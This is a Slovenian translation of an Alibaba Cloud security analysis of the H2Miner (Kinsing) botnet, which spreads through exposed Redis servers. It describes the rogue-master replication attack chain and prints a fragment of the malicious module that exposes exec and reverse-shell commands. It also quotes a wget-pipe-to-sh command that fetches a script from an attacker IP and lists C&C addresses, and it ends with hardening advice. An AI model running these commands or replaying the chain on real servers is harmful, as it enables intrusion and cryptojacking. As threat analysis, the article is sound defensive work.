Pred dnevom je enega od strežnikov mojega projekta napadel podoben črv. V iskanju odgovora na vprašanje "kaj je bilo to?" Našel sem odličen članek ekipe Alibaba Cloud Security. Ker tega članka nisem našel na Habréju, sem se odločil, da ga prevedem posebej za vas <3
Začetek
Pred kratkim je varnostna ekipa Alibaba Cloud odkrila nenaden izbruh H2Miner. Ta vrsta zlonamernega črva uporablja pomanjkanje avtorizacije ali šibka gesla za Redis kot prehode do vaših sistemov, nakar sinhronizira svoj zlonamerni modul s podrejenim prek sinhronizacije nadrejeni in podrejeni ter končno prenese ta zlonamerni modul v napadeni stroj in izvede zlonamerno navodila.
V preteklosti so bili napadi na vaše sisteme izvedeni predvsem z metodo, ki je vključevala načrtovana opravila ali ključe SSH, ki so bili zapisani v vaš računalnik, potem ko se je napadalec prijavil v Redis. Na srečo te metode ni mogoče pogosto uporabljati zaradi težav z nadzorom dovoljenj ali zaradi različnih različic sistema. Vendar pa lahko ta način nalaganja zlonamernega modula neposredno izvede napadalčeve ukaze ali pridobi dostop do lupine, kar je nevarno za vaš sistem.
Zaradi velikega števila strežnikov Redis, ki gostujejo na internetu (skoraj 1 milijon), varnostna ekipa Alibaba Cloud kot prijazen opomnik priporoča, da uporabniki ne delijo Redisa na spletu in redno preverjajo moč svojih gesel in ali so ogrožena. hitra izbira.
H2Miner
H2Miner je rudarski botnet za sisteme, ki temeljijo na Linuxu, ki lahko napade vaš sistem na različne načine, vključno s pomanjkanjem avtorizacije v ranljivostih Hadoop yarn, Docker in Redis Remote Command Execution (RCE). Botnet deluje tako, da prenaša zlonamerne skripte in zlonamerno programsko opremo za rudarjenje vaših podatkov, vodoravno razširitev napada in vzdrževanje komunikacije pri ukazovanju in nadzoru (C&C).
Redis RCE
Znanje o tej temi je delil Pavel Toporkov na ZeroNights 2018. Po različici 4.0 Redis podpira funkcijo nalaganja vtičnikov, ki uporabnikom omogoča nalaganje datotek, prevedenih s C, v Redis za izvajanje določenih ukazov Redis. Čeprav je ta funkcija uporabna, vsebuje ranljivost, pri kateri je v načinu master-slave mogoče datoteke sinhronizirati s pomožnim v načinu fullresync. To lahko napadalec uporabi za prenos zlonamernih datotek. Po končanem prenosu napadalci naložijo modul na napadeno instanco Redisa in izvedejo poljuben ukaz.
Analiza črva zlonamerne programske opreme
Pred kratkim je varnostna skupina Alibaba Cloud odkrila, da se je velikost skupine zlonamernih rudarjev H2Miner nenadoma močno povečala. Glede na analizo je splošni proces nastanka napada naslednji:
H2Miner uporablja RCE Redis za popoln napad. Napadalci najprej napadejo nezaščitene strežnike Redis ali strežnike s šibkimi gesli.
Nato uporabijo ukaz config set dbfilename red2.so da spremenite ime datoteke. Po tem napadalci izvedejo ukaz slaveof da nastavite naslov gostitelja replikacije glavni-podrejeni.
Ko napadeni primerek Redisa vzpostavi povezavo master-slave z zlonamernim Redisom, ki je v lasti napadalca, napadalec pošlje okuženi modul z ukazom fullresync za sinhronizacijo datotek. Datoteka red2.so bo nato prenesena na napadeni stroj. Napadalci nato uporabijo nalagalni modul ./red2.so, da naložijo to datoteko so. Modul lahko izvaja ukaze napadalca ali sproži povratno povezavo (backdoor), da pridobi dostop do napadenega stroja.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Po izvedbi zlonamernega ukaza, kot je npr / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, bo napadalec ponastavil ime datoteke varnostne kopije in razložil sistemski modul, da počisti sledi. Vendar bo datoteka red2.so še vedno ostala na napadenem računalniku. Uporabnikom svetujemo, naj bodo pozorni na prisotnost takšne sumljive datoteke v mapi njihove instance Redis.
Poleg uničenja nekaterih zlonamernih procesov za krajo virov je napadalec sledil zlonamernemu skriptu tako, da je prenesel in izvedel zlonamerne binarne datoteke v . To pomeni, da lahko ime procesa ali ime imenika, ki vsebuje spoznavanje na gostitelju, nakazuje, da je ta stroj okužen s tem virusom.
Glede na rezultate obratnega inženiringa zlonamerna programska oprema v glavnem izvaja naslednje funkcije:
- Nalaganje datotek in njihovo izvajanje
- Rudarstvo
- Vzdrževanje C&C komunikacije in izvajanje napadalčevih ukazov
Uporabite masscan za zunanje skeniranje, da razširite svoj vpliv. Poleg tega je naslov IP strežnika C&C trdo kodiran v programu in napadeni gostitelj bo komuniciral s komunikacijskim strežnikom C&C z uporabo zahtev HTTP, kjer so informacije o zombiju (ogroženem strežniku) identificirane v glavi HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Druge metode napada
Naslovi in povezave, ki jih uporablja črv
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Nasvet
Prvič, Redis ne sme biti dostopen iz interneta in mora biti zaščiten z močnim geslom. Pomembno je tudi, da stranke preverijo, da v imeniku Redis ni datoteke red2.so in da v imenu datoteke/procesa na gostitelju ni »kinsinga«.
Vir: www.habr.com